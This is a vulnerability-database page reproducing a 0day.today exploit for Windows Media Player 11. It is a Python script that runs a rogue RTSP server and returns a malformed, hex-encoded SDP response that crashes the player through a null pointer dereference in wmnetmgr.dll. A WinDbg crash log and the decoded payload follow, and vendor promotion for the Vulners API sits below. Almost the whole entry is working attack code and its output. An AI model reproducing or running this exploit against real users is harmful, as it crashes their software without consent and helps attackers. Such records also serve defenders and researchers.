Lucene search
K

Windows Media Player v11.0.5721.5262 Remote Denial Of Service

🗓️ 24 Dec 2011 00:00:00Reported by LevelType 
zdt
 zdt
🔗 0day.today👁 25 Views

Windows Media Player v11.0.5721.5262 Remote Denial Of Service vulnerability exploit for Windows XP SP3 x86 and Windows 7 SP2 x64

Code
import socket, binascii
print "\n" 
print "----------------------------------------------------------------"
print "|      WMP11 Remote Null Pointer                                |"
print "|      Level, Smash the Stack                                   |"
print "|      Windows XP SP3 x86, Windows Media Player v11.0.5721.5262 |"
print "|      Windows 7 SP2 x64, Windows Media Player v11.0.5721.5262  |"
print "----------------------------------------------------------------"
print "\n"
print "Attack URL: mms://127.0.0.1/Sample_Broadcast\n\n"
HOST = "127.0.0.1"
PORT = 554
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.bind((HOST, PORT))
s.listen(1)
buf = [
("525453502f312e3020323038204f4b0d0a436f6e74656e742d547970653a206170706c696361746"
"96f6e2f7364700d0a566172793a204163636570740d0a582d506c61796c6973742d47656e2d49643"
"a203137360d0a582d42726f6164636173742d49643a20300d0a436f6e74656e742d4c656e6774683"
"a203837390d0a446174653a2053756e2c203038204d617920323031312031353a32343a333320474"
"d540d0a435365713a20310d0a5365727665723a20574d5365727665722f392e312e312e333834310"
"d0a537570706f727465643a20636f6d2e6d6963726f736f66742e776d2e73727670706169722c206"
"36f6d2e6d6963726f736f66742e776d2e737377697463682c20636f6d2e6d6963726f736f66742e7"
"76d2e656f736d73672c20636f6d2e6d6963726f736f66742e776d2e6661737463616368652c20636"
"f6d2e6d6963726f736f66742e776d2e7061636b657470616972737372632c20636f6d2e6d6963726"
"f736f66742e776d2e7374617274757070726f66696c650d0a4c6173742d4d6f6469666965643a205"
"361742c2031372046656220323030372031333a31343a303420474d540d0a457461673a202231363"
"8220d0a43616368652d436f6e74726f6c3a206d61782d6167653d38363339392c20782d776d732d7"
"3747265616d2d747970653d2262726f6164636173742c20706c61796c697374222c206d7573742d7"
"26576616c69646174652c20707269766174652c20782d776d732d70726f78792d73706c69740d0a0"
"d0a763d306f3d2d20323031313035303831343339313330343036203230313130353038313433393"
"1333034303620494e20495034203132372e302e302e310d0a733d3c4e6f205469746c653e633d494"
"e2049503420302e302e302e30623d52523a30613d70676d70753a646174613a6170706c696361746"
"96f6e2f766e642e6d732e776d732d6864722e61736676313b6261736536342c4d4361796459356d7"
"a78476d3251437141474c4f624e4142414141414141414142674141414145436f6479726a4565707"
"a78474f35414441444342545a5767414141414141414141414141414141414141414141414141414"
"1414141414c784141414141414141414141414141414141414141664141414141414141414843677"
"7676b4141414141764d6e50435141414141433546514141414141414141414141414147416741414"
"26749414145673741414331413739664c716e504559376a414d414d49464e6c4c674141414141414"
"141415230744f7275716e504559376d414d414d49464e6c42674141414141416b516663743765707"
"a78474f35674441444342545a566f414141414141414141414f4562746b35627a78476f2f5143415"
"83178454b7742582b794256573838527150304167463963524373414141414141414141414177414"
"1414141414141414151414141414141514145414150414141414141414141416b516663743765707"
"a78474f35674441444342545a5849414141414141414141514a35702b4531627a78476f2f5143415"
"83178454b31444e77372b50596338526937494171674330346941414141414141414141414277414"
"1414149414141414167414141414141595145424145416641414151414141414151415141416f414"
"143494141434141414141414141455141424141415141417a6e5834653431473052474e676742676"
"c386d69736959414141414141414141416741424145673741414143414567374141417a4a724a316"
"a6d62504561625a414b6f41597335734b67414141414141414141434141494141674143414141414"
"141414141414141414141324a724a316a6d62504561625a414b6f415973357337443441414141414"
"1414141414141414141414141414141414141414141414148774141414141414141414241513d3d7"
"43d3020300d0a6d3d617564696f2030205254502f415650203936613d72656c6961626c650d0a0d0"
"a0d0a")
]
while True:
conn, addr = s.accept()
print "-----Request From Client-----\n"
print conn.recv(1024)
print "-----Request From Client-----\n"
print "-----Response From Server-----\n"
print binascii.unhexlify(buf[0])
print "-----Response From Server-----\n"
conn.send(binascii.unhexlify(buf[0]))
conn.close()
s.close()
 
#CRASH
#(ae8.5b8): Access violation - code c0000005 (first chance)
#First chance exceptions are reported before any exception handling.
#This exception may be expected and handled.
#eax=00000000 ebx=02ba4df8 ecx=00000000 edx=02b5c688 esi=013acff8 edi=00000000
#eip=128cd479 esp=02ebfb64 ebp=02ebfeec iopl=0         nv up ei pl zr na pe nc
#cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010246
#*** ERROR: Symbol file could not be found.  Defaulted to export symbols for C:\WINDOWS\system32\wmnetmgr.dll -
#wmnetmgr!DllUnregisterServer+0x76320:
#128cd479 8bb914010000    mov     edi,dword ptr [ecx+114h] ds:0023:00000114=????????
#0:021> g
#(ae8.5b8): Access violation - code c0000005 (!!! second chance !!!)
#eax=00000000 ebx=02ba4df8 ecx=00000000 edx=02b5c688 esi=013acff8 edi=00000000
#eip=128cd479 esp=02ebfb64 ebp=02ebfeec iopl=0         nv up ei pl zr na pe nc
#cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000246
#wmnetmgr!DllUnregisterServer+0x76320:
#128cd479 8bb914010000    mov     edi,dword ptr [ecx+114h] ds:0023:00000114=????????
 
#PAYLOAD#
#RTSP/1.0 208 OK
#Content-Type: application/sdp
#Vary: Accept
#X-Playlist-Gen-Id: 176
#X-Broadcast-Id: 0
#Content-Length: 879
#Date: Sun, 08 May 2011 15:24:33 GMT
#CSeq: 1
#Server: WMServer/9.1.1.3841
#Supported: com.microsoft.wm.srvppair, com.microsoft.wm.sswitch, com.microsoft.wm.eosmsg, com.microsoft.wm.fastcache, com.microsoft.wm.packetpairssrc, com.microsoft.wm.startupprofile
#Last-Modified: Sat, 17 Feb 2007 13:14:04 GMT
#Etag: "168"
#Cache-Control: max-age=86399, x-wms-stream-type="broadcast, playlist", must-revalidate, private, x-wms-proxy-split
#v=0o=- 201105081439130406 201105081439130406 IN IP4 127.0.0.1
#s=<No Title>c=IN IP4 0.0.0.0b=RR:0a=pgmpu:data:application/vnd.ms.wms-hdr.asfv1;base64,MCaydY5mzxGm2QCqAGLObNABAAAAAAAABgAAAAECodyrjEepzxGO5ADADC
#BTZWgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAALxAAAAAAAAAAAAAAAAAAAAfAAAAAAAAAHCgwgkAAAAAvM
#nPCQAAAAC5FQAAAAAAAAAAAAAGAgAABgIAAEg7AAC1A79fLqnPEY7jAMAMIFNlLgAAAAAAAAAR0tOruq
#nPEY7mAMAMIFNlBgAAAAAAkQfct7epzxGO5gDADCBTZVoAAAAAAAAAAOEbtk5bzxGo/QCAX1xEKwBX+y
#BVW88RqP0AgF9cRCsAAAAAAAAAAAwAAAAAAAAAAQAAAAAAQAEAAPAAAAAAAAAAkQfct7epzxGO5gDADC
#BTZXIAAAAAAAAAQJ5p+E1bzxGo/QCAX1xEK1DNw7+PYc8Ri7IAqgC04iAAAAAAAAAAABwAAAAIAAAAAg
#AAAAAAYQEBAEAfAAAQAAAAAQAQAAoAACIAACAAAAAAAAEQABAAAQAAznX4e41G0RGNggBgl8misiYAAA
#AAAAAAAgABAEg7AAACAEg7AAAzJrJ1jmbPEabZAKoAYs5sKgAAAAAAAAACAAIAAgACAAAAAAAAAAAAAA
#A2JrJ1jmbPEabZAKoAYs5s7D4AAAAAAAAAAAAAAAAAAAAAAAAAAAAAHwAAAAAAAAABAQ==t=0 0m=audio 0 RTP/AVP 96a=reliable





#  0day.today [2018-01-02]  #

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation